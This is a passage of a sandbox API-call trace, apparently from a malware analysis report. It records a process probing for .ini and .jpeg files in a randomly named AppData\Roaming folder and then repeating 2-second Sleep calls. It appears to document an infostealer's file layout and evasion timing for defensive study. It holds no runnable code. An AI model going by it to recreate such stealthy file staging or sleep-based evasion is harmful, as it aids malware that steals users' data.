"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.512] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0278.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.512] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.512] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0278.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.512] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.512] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0278.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.512] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.512] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0278.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.512] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.512] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0278.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.512] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.513] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.513] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0278.513] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.513] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.513] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.513] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0278.513] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.513] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.513] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.513] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0278.513] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.513] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.513] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0278.513] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0278.513] Sleep (dwMilliseconds=0x7d0) [0278.515] Sleep (dwMilliseconds=0x7d0) [0278.516] Sleep (dwMilliseconds=0x7d0) [0278.517] Sleep (dwMilliseconds=0x7d0) [0278.519] Sleep (dwMilliseconds=0x7d0) [0278.520] Sleep (dwMilliseconds=0x7d0) [0278.569] Sleep (dwMilliseconds=0x7d0) [0278.572] Sleep (dwMilliseconds=0x7d0) [0278.575] Sleep (dwMilliseconds=0x7d0) [0278.577] Sleep (dwMilliseconds=0x7d0) [0278.583] Sleep (dwMilliseconds=0x7d0) [0278.595] Sleep (dwMilliseconds=0x7d0) [0278.597] Sleep (dwMilliseconds=0x7d0) [0278.598] Sleep (dwMilliseconds=0x7d0) [0278.600] Sleep (dwMilliseconds=0x7d0) [0278.603] Sleep (dwMilliseconds=0x7d0) [0278.604] Sleep (dwMilliseconds=0x7d0) [0278.607] Sleep (dwMilliseconds=0x7d0) [0278.609] Sleep (dwMilliseconds=0x7d0) [0278.610] Sleep (dwMilliseconds=0x7d0) [0278.612] Sleep (dwMilliseconds=0x7d0) [0278.613] Sleep (dwMilliseconds=0x7d0) [0278.616] Sleep (dwMilliseconds=0x7d0) [0278.618] Sleep (dwMilliseconds=0x7d0) [0278.619] Sleep (dwMilliseconds=0x7d0) [0278.621] Sleep (dwMilliseconds=0x7d0) [0278.623] Sleep (dwMilliseconds=0x7d0) [0278.624] Sleep (dwMilliseconds=0x7d0) [0278.626] Sleep (dwMilliseconds=0x7d0) [0278.628] Sleep (dwMilliseconds=0x7d0) [0278.631] Sleep (dwMilliseconds=0x7d0) [0278.634] Sleep (dwMilliseconds=0x7d0) [0278.636] Sleep (dwMilliseconds=0x7d0) [0278.638] Sleep (dwMilliseconds=0x7d0) [0278.643] Sleep (dwMilliseconds=0x7d0) [0278.644] Sleep (dwMilliseconds=0x7d0) [0278.647] Sleep (dwMilliseconds=0x7d0) [0278.648] Sleep (dwMilliseconds=0x7d0) [0278.650] Sleep (dwMilliseconds=0x7d0) [0278.655] Sleep (dwMilliseconds=0x7d0) [0278.658] Sleep (dwMilliseconds=0x7d0) [0278.664] Sleep (dwMilliseconds=0x7d0) [0278.668] Sleep (dwMilliseconds=0x7d0) [0278.670] Sleep (dwMilliseconds=0x7d0) [0278.674] Sleep (dwMilliseconds=0x7d0) [0278.681] Sleep (dwMilliseconds=0x7d0) [0278.685] Sleep (dwMilliseconds=0x7d0) [0278.689] Sleep (dwMilliseconds=0x7d0) [0278.691] Sleep (dwMilliseconds=0x7d0) [0278.693] Sleep (dwMilliseconds=0x7d0) [0278.695] Sleep (dwMilliseconds=0x7d0) [0278.696] Sleep (dwMilliseconds=0x7d0) [0278.698] Sleep (dwMilliseconds=0x7d0) [0278.699] Sleep (dwMilliseconds=0x7d0) [0278.701] Sleep (dwMilliseconds=0x7d0) [0278.704] Sleep (dwMilliseconds=0x7d0) [0278.706] Sleep (dwMilliseconds=0x7d0) [0278.707] Sleep (dwMilliseconds=0x7d0) [0278.709] Sleep (dwMilliseconds=0x7d0) [0278.710] Sleep (dwMilliseconds=0x7d0) [0278.712] Sleep (dwMilliseconds=0x7d0) [0278.713] Sleep (dwMilliseconds=0x7d0) [0278.718] Sleep (dwMilliseconds=0x7d0) [0278.719] Sleep (dwMilliseconds=0x7d0) [0278.721] Sleep (dwMilliseconds=0x7d0) [0278.722] Sleep (dwMilliseconds=0x7d0) [0278.724] Sleep (dwMilliseconds=0x7d0) [0278.726] Sleep (dwMilliseconds=0x7d0) [0278.727] Sleep (dwMilliseconds=0x7d0) [0278.732] Sleep (dwMilliseconds=0x7d0) [0278.733] Sleep (dwMilliseconds=0x7d0) [0278.735] Sleep (dwMilliseconds=0x7d0) [0278.736] Sleep (dwMilliseconds=0x7d0) [0278.738] Sleep (dwMilliseconds=0x7d0) [0278.739] Sleep (dwMilliseconds=0x7d0) [0278.744] Sleep (dwMilliseconds=0x7d0) [0278.746] Sleep (dwMilliseconds=0x7d0) [0278.748] Sleep (dwMilliseconds=0x7d0) [0278.749] Sleep (dwMilliseconds=0x7d0) [0278.751] Sleep (dwMilliseconds=0x7d0) [0278.752] Sleep (dwMilliseconds=0x7d0) [0278.754] Sleep (dwMilliseconds=0x7d0) [0278.755] Sleep (dwMilliseconds=0x7d0) [0278.757] Sleep (dwMilliseconds=0x7d0) [0278.767] Sleep (dwMilliseconds=0x7d0) [0278.768] Sleep (dwMilliseconds=0x7d0) [0278.770] Sleep (dwMilliseconds=0x7d0) [0278.771] Sleep (dwMilliseconds=0x7d0) [0278.773] Sleep (dwMilliseconds=0x7d0) [0278.774] Sleep (dwMilliseconds=0x7d0) [0278.776] Sleep (dwMilliseconds=0x7d0) [0278.777] Sleep (dwMilliseconds=0x7d0) [0278.780] Sleep (dwMilliseconds=0x7d0) [0278.781] Sleep (dwMilliseconds=0x7d0) [0278.783] Sleep (dwMilliseconds=0x7d0) [0278.784] Sleep (dwMilliseconds=0x7d0) [0278.786] Sleep (dwMilliseconds=0x7d0) [0278.787] Sleep (dwMilliseconds=0x7d0) [0278.789] Sleep (dwMilliseconds=0x7d0) [0278.790] Sleep (dwMilliseconds=0x7d0) [0278.792] Sleep (dwMilliseconds=0x7d0) [0278.793] Sleep (dwMilliseconds=0x7d0) [0278.795] Sleep (dwMilliseconds=0x7d0) [0278.796] Sleep (dwMilliseconds=0x7d0) [0278.801] Sleep (dwMilliseconds=0x7d0) [0278.803] Sleep (dwMilliseconds=0x7d0) [0278.804] Sleep (dwMilliseconds=0x7d0) [0278.806] Sleep (dwMilliseconds=0x7d0) [0278.807] Sleep (dwMilliseconds=0x7d0) [0278.809] Sleep (dwMilliseconds=0x7d0) [0278.810] Sleep (dwMilliseconds=0x7d0) [0278.813] Sleep (dwMilliseconds=0x7d0) [0278.814] Sleep (dwMilliseconds=0x7d0) [0278.822] Sleep (dwMilliseconds=0x7d0) [0278.824] Sleep (dwMilliseconds=0x7d0) [0278.825] Sleep (dwMilliseconds=0x7d0) [0278.827] Sleep (dwMilliseconds=0x7d0) [0278.828] Sleep (dwMilliseconds=0x7d0) [0278.830] Sleep (dwMilliseconds=0x7d0) [0278.831] Sleep (dwMilliseconds=0x7d0) [0278.833] Sleep (dwMilliseconds=0x7d0) [0278.834] Sleep (dwMilliseconds=0x7d0) [0278.836] Sleep (dwMilliseconds=0x7d0) [0278.837] Sleep (dwMilliseconds=0x7d0) [0278.839] Sleep (dwMilliseconds=0x7d0) [0278.840] Sleep (dwMilliseconds=0x7d0) [0278.842] Sleep (dwMilliseconds=0x7d0) [0278.843] Sleep (dwMilliseconds=0x7d0) [0278.845] Sleep (dwMilliseconds=0x7d0) [0278.846] Sleep (dwMilliseconds=0x7d0) [0278.848] Sleep (dwMilliseconds=0x7d0) [0278.849] Sleep (dwMilliseconds=0x7d0) [0278.851] Sleep (dwMilliseconds=0x7d0) [0278.852] Sleep (dwMilliseconds=0x7d0) [0278.854] Sleep (dwMilliseconds=0x7d0) [0278.855] Sleep (dwMilliseconds=0x7d0) [0278.857] Sleep (dwMilliseconds=0x7d0) [0278.858] Sleep (dwMilliseconds=0x7d0) [0278.860] Sleep (dwMilliseconds=0x7d0) [0278.861] Sleep (dwMilliseconds=0x7d0) [0278.863] Sleep (dwMilliseconds=0x7d0) [0278.864] Sleep (dwMilliseconds=0x7d0) [0278.866] Sleep (dwMilliseconds=0x7d0) [0278.894] Sleep (dwMilliseconds=0x7d0) [0278.895] Sleep (dwMilliseconds=0x7d0) [0278.903] Sleep (dwMilliseconds=0x7d0) [0278.904] Sleep (dwMilliseconds=0x7d0) [0278.905] Sleep (dwMilliseconds=0x7d0) [0278.907] Sleep (dwMilliseconds=0x7d0) [0278.908] Sleep (dwMilliseconds=0x7d0) [0278.910] Sleep (dwMilliseconds=0x7d0) [0278.911] Sleep (dwMilliseconds=0x7d0) [0278.913] Sleep (dwMilliseconds=0x7d0) [0278.914] Sleep (dwMilliseconds=0x7d0) [0278.916] Sleep (dwMilliseconds=0x7d0) [0278.917] Sleep (dwMilliseconds=0x7d0) [0278.919] Sleep (dwMilliseconds=0x7d0) [0278.920] Sleep (dwMilliseconds=0x7d0) [0278.922] Sleep (dwMilliseconds=0x7d0) [0278.923] Sleep (dwMilliseconds=0x7d0) [0278.925] Sleep (dwMilliseconds=0x7d0) [0278.926] Sleep (dwMilliseconds=0x7d0) [0278.928] Sleep (dwMilliseconds=0x7d0) [0278.929] Sleep (dwMilliseconds=0x7d0) [0278.931] Sleep (dwMilliseconds=0x7d0) [0278.932] Sleep (dwMilliseconds=0x7d0) [0278.934] Sleep (dwMilliseconds=0x7d0) [0278.935] Sleep (dwMilliseconds=0x7d0) [0278.937] Sleep (dwMilliseconds=0x7d0) [0278.938] Sleep (dwMilliseconds=0x7d0) [0278.940] Sleep (dwMilliseconds=0x7d0) [0278.941] Sleep (dwMilliseconds=0x7d0) [0279.009] Sleep (dwMilliseconds=0x7d0) [0279.011] Sleep (dwMilliseconds=0x7d0) [0279.012] Sleep (dwMilliseconds=0x7d0) [0279.014] Sleep (dwMilliseconds=0x7d0) [0279.015] Sleep (dwMilliseconds=0x7d0) [0279.017] Sleep (dwMilliseconds=0x7d0) [0279.019] Sleep (dwMilliseconds=0x7d0) [0279.020] Sleep (dwMilliseconds=0x7d0) [0279.021] Sleep (dwMilliseconds=0x7d0) [0279.023] Sleep (dwMilliseconds=0x7d0) [0279.024] Sleep (dwMilliseconds=0x7d0) [0279.026] Sleep (dwMilliseconds=0x7d0) [0279.027] Sleep (dwMilliseconds=0x7d0) [0279.029] Sleep (dwMilliseconds=0x7d0) [0279.031] Sleep (dwMilliseconds=0x7d0) [0279.032] Sleep (dwMilliseconds=0x7d0) [0279.033] Sleep (dwMilliseconds=0x7d0) [0279.035] Sleep (dwMilliseconds=0x7d0) [0279.036] Sleep (dwMilliseconds=0x7d0) [0279.038] Sleep (dwMilliseconds=0x7d0) [0279.039] Sleep (dwMilliseconds=0x7d0) [0279.041] Sleep (dwMilliseconds=0x7d0) [0279.042] Sleep (dwMilliseconds=0x7d0) [0279.044] Sleep (dwMilliseconds=0x7d0) [0279.045] Sleep (dwMilliseconds=0x7d0) [0279.047] Sleep (dwMilliseconds=0x7d0) [0279.048] Sleep (dwMilliseconds=0x7d0) [0279.050] Sleep (dwMilliseconds=0x7d0) [0279.051] Sleep (dwMilliseconds=0x7d0) [0279.053] Sleep (dwMilliseconds=0x7d0) [0279.054] Sleep (dwMilliseconds=0x7d0) [0279.056] Sleep (dwMilliseconds=0x7d0) [0279.057] Sleep (dwMilliseconds=0x7d0) [0279.059] Sleep (dwMilliseconds=0x7d0) [0279.060] Sleep (dwMilliseconds=0x7d0) [0279.062] Sleep (dwMilliseconds=0x7d0) [0279.063] Sleep (dwMilliseconds=0x7d0) [0279.065] Sleep (dwMilliseconds=0x7d0) [0279.067] Sleep (dwMilliseconds=0x7d0) [0279.070] Sleep (dwMilliseconds=0x7d0) [0279.071] Sleep (dwMilliseconds=0x7d0) [0279.072] Sleep (dwMilliseconds=0x7d0) [0279.074] Sleep (dwMilliseconds=0x7d0) [0279.075] Sleep (dwMilliseconds=0x7d0) [0279.077] Sleep (dwMilliseconds=0x7d0) [0279.078] Sleep (dwMilliseconds=0x7d0) [0279.080] Sleep (dwMilliseconds=0x7d0) [0279.081] Sleep (dwMilliseconds=0x7d0) [0279.083] Sleep (dwMilliseconds=0x7d0) [0279.084] Sleep (dwMilliseconds=0x7d0) [0279.086] Sleep (dwMilliseconds=0x7d0) [0279.087] Sleep (dwMilliseconds=0x7d0) [0279.089] Sleep (dwMilliseconds=0x7d0) [0279.091] Sleep (dwMilliseconds=0x7d0) [0279.092] Sleep (dwMilliseconds=0x7d0) [0279.093] Sleep (dwMilliseconds=0x7d0) [0279.095] Sleep (dwMilliseconds=0x7d0) [0279.096] Sleep (dwMilliseconds=0x7d0) [0279.098] Sleep (dwMilliseconds=0x7d0) [0279.099] Sleep (dwMilliseconds=0x7d0) [0279.101] Sleep (dwMilliseconds=0x7d0) [0279.102] Sleep (dwMilliseconds=0x7d0) [0279.104] Sleep (dwMilliseconds=0x7d0) [0279.105] Sleep (dwMilliseconds=0x7d0) [0279.107] Sleep (dwMilliseconds=0x7d0) [0279.109] Sleep (dwMilliseconds=0x7d0) [0279.110] Sleep (dwMilliseconds=0x7d0) [0279.112] Sleep (dwMilliseconds=0x7d0) [0279.113] Sleep (dwMilliseconds=0x7d0) [0279.115] Sleep (dwMilliseconds=0x7d0) [0279.116] Sleep (dwMilliseconds=0x7d0) [0279.118] Sleep (dwMilliseconds=0x7d0) [0279.119] Sleep (dwMilliseconds=0x7d0) [0279.121] Sleep (dwMilliseconds=0x7d0) [0279.122] Sleep (dwMilliseconds=0x7d0) [0279.220] Sleep (dwMilliseconds=0x7d0) [0279.221] Sleep (dwMilliseconds=0x7d0) [0279.223] Sleep (dwMilliseconds=0x7d0) [0279.224] Sleep (dwMilliseconds=0x7d0) [0279.226] Sleep (dwMilliseconds=0x7d0) [0279.227] Sleep (dwMilliseconds=0x7d0) [0279.229] Sleep (dwMilliseconds=0x7d0) [0279.230] Sleep (dwMilliseconds=0x7d0) [0279.232] Sleep (dwMilliseconds=0x7d0) [0279.234] Sleep (dwMilliseconds=0x7d0) [0279.235] Sleep (dwMilliseconds=0x7d0) [0279.237] Sleep (dwMilliseconds=0x7d0) [0279.242] Sleep (dwMilliseconds=0x7d0) [0279.244] Sleep (dwMilliseconds=0x7d0) [0279.245] Sleep (dwMilliseconds=0x7d0) [0279.247] Sleep (dwMilliseconds=0x7d0) [0279.248] Sleep (dwMilliseconds=0x7d0) [0279.250] Sleep (dwMilliseconds=0x7d0) [0279.251] Sleep (dwMilliseconds=0x7d0) [0279.253] Sleep (dwMilliseconds=0x7d0) [0279.254] Sleep (dwMilliseconds=0x7d0) [0279.256] Sleep (dwMilliseconds=0x7d0) [0279.257] Sleep (dwMilliseconds=0x7d0) [0279.259] Sleep (dwMilliseconds=0x7d0) [0279.260] Sleep (dwMilliseconds=0x7d0) [0279.262] Sleep (dwMilliseconds=0x7d0) [0279.263] Sleep (dwMilliseconds=0x7d0) [0279.265] Sleep (dwMilliseconds=0x7d0) [0279.266] Sleep (dwMilliseconds=0x7d0) [0279.268] Sleep (dwMilliseconds=0x7d0) [0279.269] Sleep (dwMilliseconds=0x7d0) [0279.271] Sleep (dwMilliseconds=0x7d0) [0279.272] Sleep (dwMilliseconds=0x7d0) [0279.274] Sleep (dwMilliseconds=0x7d0) [0279.275] Sleep (dwMilliseconds=0x7d0) [0279.277] Sleep (dwMilliseconds=0x7d0) [0279.278] Sleep (dwMilliseconds=0x7d0) [0279.280] Sleep (dwMilliseconds=0x7d0) [0279.281] Sleep (dwMilliseconds=0x7d0) [0279.283] Sleep (dwMilliseconds=0x7d0) [0279.284] Sleep (dwMilliseconds=0x7d0) [0279.286] Sleep (dwMilliseconds=0x7d0) [0279.287] Sleep (dwMilliseconds=0x7d0) [0279.289] Sleep (dwMilliseconds=0x7d0) [0279.290] Sleep (dwMilliseconds=0x7d0) [0279.292] Sleep (dwMilliseconds=0x7d0) [0279.293] Sleep (dwMilliseconds=0x7d0) [0279.295] Sleep (dwMilliseconds=0x7d0) [0279.296] Sleep (dwMilliseconds=0x7d0) [0279.298] Sleep (dwMilliseconds=0x7d0) [0279.299] Sleep (dwMilliseconds=0x7d0) [0279.301] Sleep (dwMilliseconds=0x7d0) [0279.302] Sleep (dwMilliseconds=0x7d0) [0279.304] Sleep (dwMilliseconds=0x7d0) [0279.305] Sleep (dwMilliseconds=0x7d0) [0279.307] Sleep (dwMilliseconds=0x7d0) [0279.308] Sleep (dwMilliseconds=0x7d0) [0279.310] Sleep (dwMilliseconds=0x7d0) [0279.311] Sleep (dwMilliseconds=0x7d0) [0279.313] Sleep (dwMilliseconds=0x7d0) [0279.314] Sleep (dwMilliseconds=0x7d0) [0279.316] Sleep (dwMilliseconds=0x7d0) [0279.317] Sleep (dwMilliseconds=0x7d0) [0279.320] Sleep (dwMilliseconds=0x7d0) [0279.321] Sleep (dwMilliseconds=0x7d0) [0279.323] Sleep (dwMilliseconds=0x7d0) [0279.324] Sleep (dwMilliseconds=0x7d0) [0279.326] Sleep (dwMilliseconds=0x7d0) [0279.327] Sleep (dwMilliseconds=0x7d0) [0279.330] Sleep (dwMilliseconds=0x7d0) [0279.332] Sleep (dwMilliseconds=0x7d0) [0279.333] Sleep (dwMilliseconds=0x7d0) [0279.335] Sleep (dwMilliseconds=0x7d0) [0279.336] 